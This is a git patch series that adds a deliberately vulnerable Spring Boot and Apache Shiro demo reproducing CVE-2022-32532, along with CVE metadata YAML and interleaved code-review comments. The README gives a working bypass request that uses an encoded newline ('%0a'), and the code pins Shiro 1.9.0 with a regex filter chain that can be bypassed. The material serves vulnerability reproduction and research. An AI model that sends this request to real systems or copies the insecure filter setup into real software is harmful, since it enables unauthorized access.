From 00a87dc29b7472c7c296213e8ce660d6afadf20a Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Sun, 9 Apr 2023 02:36:32 +0800
Subject: [PATCH 1/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/.gitignore | 3 ++
.../inspectionProfiles/profiles_settings.xml | 6 +++
.idea/misc.xml | 4 ++
.idea/modules.xml | 8 ++++
.idea/openkylin-exploit-db.iml | 12 ++++++
.idea/vcs.xml | 6 +++
...E-2022-23131.yaml => CVE-2022-23131.yaml} | 38 +++++++++----------
7 files changed, 58 insertions(+), 19 deletions(-)
create mode 100644 .idea/.gitignore
create mode 100644 .idea/inspectionProfiles/profiles_settings.xml
create mode 100644 .idea/misc.xml
create mode 100644 .idea/modules.xml
create mode 100644 .idea/openkylin-exploit-db.iml
create mode 100644 .idea/vcs.xml
rename cve/zabbix/2022/yaml/{CVE-2022-23131.yaml => CVE-2022-23131.yaml} (98%)
diff --git a/.idea/.gitignore b/.idea/.gitignore
new file mode 100644
index 00000000..26d33521
--- /dev/null
+++ b/.idea/.gitignore
@@ -0,0 +1,3 @@
+# Default ignored files
+/shelf/
+/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
new file mode 100644
index 00000000..105ce2da
--- /dev/null
+++ b/.idea/inspectionProfiles/profiles_settings.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 00000000..dc9ea490
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
new file mode 100644
index 00000000..f36de21d
--- /dev/null
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
new file mode 100644
index 00000000..8b8c3954
--- /dev/null
+++ b/.idea/openkylin-exploit-db.iml
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
new file mode 100644
index 00000000..94a25f7f
--- /dev/null
+++ b/.idea/vcs.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
similarity index 98%
rename from cve/zabbix/2022/yaml/CVE-2022-23131.yaml
rename to cve/zabbix/2022/yaml/CVE-2022-23131.yaml
index 0eab256c..e3f384c6 100644
--- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
+++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
@@ -1,20 +1,20 @@
-id: CVE-2022-23131
-source:
- https://github.com/L0ading-x/cve-2022-23131
-info:
- name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
- severity: critical
- description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
- scope-of-influence:
- Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- - https://www.secpulse.com/archives/179601.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-23131
- cwe-id: CWE-290
- cnvd-id: None
- kve-id: None
+id: CVE-2022-23131
+source:
+ https://github.com/L0ading-x/cve-2022-23131
+info:
+ name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
+ severity: critical
+ description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
+ scope-of-influence:
+ Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
+ - https://www.secpulse.com/archives/179601.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-23131
+ cwe-id: CWE-290
+ cnvd-id: None
+ kve-id: None
tags: 前端认证绕过漏洞
\ No newline at end of file
--
Gitee
From 33b810b8fcc2703e97e4d73b63180433305ce55a Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Sun, 9 Apr 2023 11:24:02 +0800
Subject: [PATCH 2/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../2022/CVE-2022-32532/.gitignore | 33 +++++++++++++++
.../2022/CVE-2022-32532/README.md | 35 ++++++++++++++++
cve/apache-Shiro/2022/CVE-2022-32532/pom.xml | 38 ++++++++++++++++++
.../com/example/shirodemo/DemoController.java | 21 ++++++++++
.../java/com/example/shirodemo/MyFilter.java | 35 ++++++++++++++++
.../shirodemo/MyShiroFilterFactoryBean.java | 40 +++++++++++++++++++
.../com/example/shirodemo/ShiroConfig.java | 22 ++++++++++
.../shirodemo/ShiroDemoApplication.java | 13 ++++++
.../src/main/resources/application.properties | 0
.../2022/yaml/CVE-2022-32532.yaml | 23 +++++++++++
openkylin_list.yaml | 4 +-
11 files changed, 263 insertions(+), 1 deletion(-)
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/README.md
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
create mode 100644 cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
new file mode 100644
index 00000000..975b0366
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
@@ -0,0 +1,35 @@
+# CVE-2022-32532
+
+## about
+
+This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
+
+In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
+
+## introduce
+
+Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
+
+This request can succeed
+```http request
+GET /permit/any HTTP/1.1
+Token: 4ra1n
+```
+
+Access is not allowed when there is no token request header
+```http request
+GET /permit/any HTTP/1.1
+```
+
+It can be bypassed in a simple way in special but common configurations
+```http request
+GET /permit/a%0any HTTP/1.1
+```
+
+## reference
+
+https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+
+This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
+
+Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
new file mode 100644
index 00000000..5210b547
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
@@ -0,0 +1,38 @@
+
+
+ 4.0.0
+
+ org.springframework.boot
+ spring-boot-starter-parent
+ 2.7.0
+
+
+ com.example
+ shiro-demo
+ 0.0.1-SNAPSHOT
+ shiro-demo
+ CVE-2022-32532
+
+ 1.8
+
+
+
+ org.springframework.boot
+ spring-boot-starter-web
+
+
+ org.apache.shiro
+ shiro-spring
+ 1.9.0
+
+
+
+
+
+ org.springframework.boot
+ spring-boot-maven-plugin
+
+
+
+
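Review bot: The shiro-spring version on the line reading `1.9.0` is the vulnerable release this demo depends on (the CVE yaml added in the same patch states the issue affects Apache Shiro before 1.9.1), but nothing in the file marks the pin as deliberate, so a routine dependency bump would silently turn the reproduction into a project that no longer reproduces anything. Add an XML comment next to the version, e.g. `<!-- intentionally pinned: CVE-2022-32532 is reported fixed in Shiro 1.9.1; do not bump -->`. The element tags appear to have been stripped in this rendering, so the placement is given relative to the version value rather than a tag name.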
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
new file mode 100644
index 00000000..fd71b1a0
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
@@ -0,0 +1,21 @@
+package com.example.shirodemo;
+
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class DemoController {
+ @RequestMapping(path = "/permit/{value}")
+ public String permit(@PathVariable String value) {
+ System.out.println("success!");
+ return "success";
+ }
+
+ // Another Bypass
+ // @RequestMapping(path = "/permit/*")
+ public String permit() {
+ System.out.println("success!");
+ return "success";
+ }
+}
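Review bot: The second `permit()` overload at the bottom of the class has its `@RequestMapping` commented out, so it is unreachable dead code and the `// Another Bypass` comment does not say what a reader is meant to do with it. Either remove it or extend the comment, e.g. `// Alternative handler mapped on /permit/*; un-comment the annotation above to try it`. Both handlers also report success only via `System.out.println`, which is fine for a demo but worth stating in a comment since the class lives in a CVE corpus and has no other logging.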
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
new file mode 100644
index 00000000..beaf98ae
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
@@ -0,0 +1,35 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.AccessControlFilter;
+
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+public class MyFilter extends AccessControlFilter {
+
+ public MyFilter(){
+ super();
+ this.pathMatcher = new RegExPatternMatcher();
+ }
+
+ @Override
+ protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
+ String token = ((HttpServletRequest)request).getHeader("Token");
+ // todo: check permission ...
+ return token != null && token.equals("4ra1n");
+ }
+
+ @Override
+ protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
+ System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
+ try {
+ response.getWriter().println("access denied");
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ return false;
+ }
+}
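Review bot: `onAccessDenied` writes "access denied" to the body but never sets an HTTP error status, so the client gets the default status (200 unless something upstream changed it) with a deny message, which makes the README's "access is not allowed" case indistinguishable from success by status code. Set the status before writing, e.g. `((HttpServletResponse) response).setStatus(HttpServletResponse.SC_FORBIDDEN);` (this needs a `javax.servlet.http.HttpServletResponse` import alongside the existing `HttpServletRequest` one). The hard-coded `"4ra1n"` value in `isAccessAllowed` is a demo credential, so a one-line comment saying so would stop it being read as a real check; writing the comparison as `"4ra1n".equals(token)` would also make the explicit null test unnecessary.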
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
new file mode 100644
index 00000000..d24431e4
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
@@ -0,0 +1,40 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.mgt.*;
+import org.apache.shiro.web.mgt.WebSecurityManager;
+import org.apache.shiro.web.servlet.AbstractShiroFilter;
+
+
+public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
+
+ public MyShiroFilterFactoryBean() {
+ super();
+ }
+
+ @Override
+ protected AbstractShiroFilter createInstance() {
+ SecurityManager securityManager = this.getSecurityManager();
+ FilterChainManager manager = new DefaultFilterChainManager();
+ manager.addFilter("myFilter",new MyFilter());
+ // my filter
+ manager.addToChain("/permit/.*", "myFilter");
+ // todo: add other filters
+
+ PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
+ chainResolver.setFilterChainManager(manager);
+ // set RegExPatternMatcher
+ chainResolver.setPathMatcher(new RegExPatternMatcher());
+ return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
+ }
+
+ static class SpringShiroFilter extends AbstractShiroFilter {
+ protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
+ this.setSecurityManager(webSecurityManager);
+ this.setFilterChainResolver(resolver);
+ }
+ }
+}
+
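Review bot: The chain definition `manager.addToChain("/permit/.*", "myFilter")` together with `chainResolver.setPathMatcher(new RegExPatternMatcher())` is the exact condition this demo exists to show, yet neither line says why: in `java.util.regex` a `.` does not match line terminators unless `Pattern.DOTALL` is set, so a request path carrying an encoded newline (the README's `%0a` case) falls outside the chain and the filter is never consulted. Add a comment above the `addToChain` line such as `// '.' in java.util.regex does not match line terminators by default; this chain is the CVE-2022-32532 condition reproduced here (see README)`. The `RegExPatternMatcher` assigned in `MyFilter`'s constructor presumably governs only that filter's own path matching, while the resolver's matcher set here is what selects the chain; a comment distinguishing the two would help, and `// todo: add other filters` suggests the parent bean's configured filter chain definitions are not carried over, which should be stated if intentional.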
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
new file mode 100644
index 00000000..30a0f1b5
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
@@ -0,0 +1,22 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+@Configuration
+public class ShiroConfig {
+
+ @Bean
+ public SecurityManager securityManager() {
+ return new DefaultWebSecurityManager();
+ }
+
+ @Bean
+ public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
+ MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
+ shiroFilterFactoryBean.setSecurityManager(securityManager);
+ return shiroFilterFactoryBean;
+ }
+}
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
new file mode 100644
index 00000000..5d4615bd
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
@@ -0,0 +1,13 @@
+package com.example.shirodemo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class ShiroDemoApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ShiroDemoApplication.class, args);
+ }
+
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
new file mode 100644
index 00000000..e69de29b
diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
new file mode 100644
index 00000000..12fb0f1a
--- /dev/null
+++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-32532
+source: https://github.com/Lay0us1/CVE-2022-32532
+info:
+ name: Apache Shiro是美国阿帕奇(Apache)基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。
+ severity: CRITICAL
+ description: |
+ 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。
+ scope-of-influence:
+ Apache Shiro 1.9.1之前
+ reference:
+ - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-32532
+ - https://www.cybersecurity-help.cz/vdb/SB2022062909
+ - https://cxsecurity.com/cveshow/CVE-2022-32532/
+ - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-32532
+ cwe-id: CWE-863
+ cnvd-id: CNNVD-202206-2750
+ kve-id: None
+ tags: 旁路授权
\ No newline at end of file
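Review bot: The `cnvd-id: CNNVD-202206-2750` line holds a CNNVD identifier, but the key (and the `cnvd-id: None` in the other yaml file of this series) names CNVD, which is a different database; if the schema means CNVD this value belongs under a separate key or should be `None`, and if a CNNVD id is intended the key should say so. `severity: CRITICAL` is also upper-case here while the Zabbix entry in patch 1 uses `severity: critical`, so a consumer comparing the string literally sees two different levels — pick one case. `kve-id: None` is the plain string `None` rather than a YAML null, which matches the existing convention in this repo but is worth knowing when these files are parsed.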
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 7128c8a6..c3c646b5 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -38,7 +38,9 @@ cve:
apache-unomi:
- CVE-2020-13942
apache-struts:
- - CVE-2019-0230
+ - CVE-2019-0230
+ apache-Shiro:
+ - CVE-2022-32532
Influx-DB:
- CVE-2019-20933
linux-kernel:
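Review bot: The new key `apache-Shiro` is the only mixed-case `apache-*` entry; its neighbours are `apache-unomi` and `apache-struts`. The capitalisation matches the `cve/apache-Shiro/` directory added in the same patch, so if this list key is used to locate the directory both would need renaming together; otherwise lower-casing it to `apache-shiro` keeps the list consistent. The `- CVE-2019-0230` line under `apache-struts` is removed and re-added with no visible text change, which looks like a whitespace-only edit and could be dropped from the patch.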
--
Gitee
From 2e50b4b42e7909c2608f6223e8ee8c9f21383fbc Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Tue, 11 Apr 2023 19:08:31 +0800
Subject: [PATCH 3/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/.gitignore | 3 ---
.idea/inspectionProfiles/profiles_settings.xml | 6 ------
.idea/misc.xml | 4 ----
.idea/modules.xml | 8 --------
.idea/openkylin-exploit-db.iml | 12 ------------
.idea/vcs.xml | 6 ------
6 files changed, 39 deletions(-)
delete mode 100644 .idea/.gitignore
delete mode 100644 .idea/inspectionProfiles/profiles_settings.xml
delete mode 100644 .idea/misc.xml
delete mode 100644 .idea/modules.xml
delete mode 100644 .idea/openkylin-exploit-db.iml
delete mode 100644 .idea/vcs.xml
diff --git a/.idea/.gitignore b/.idea/.gitignore
deleted file mode 100644
index 26d33521..00000000
--- a/.idea/.gitignore
+++ /dev/null
@@ -1,3 +0,0 @@
-# Default ignored files
-/shelf/
-/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
deleted file mode 100644
index 105ce2da..00000000
--- a/.idea/inspectionProfiles/profiles_settings.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
deleted file mode 100644
index dc9ea490..00000000
--- a/.idea/misc.xml
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
deleted file mode 100644
index f36de21d..00000000
--- a/.idea/modules.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
deleted file mode 100644
index 8b8c3954..00000000
--- a/.idea/openkylin-exploit-db.iml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
deleted file mode 100644
index 94a25f7f..00000000
--- a/.idea/vcs.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
--
Gitee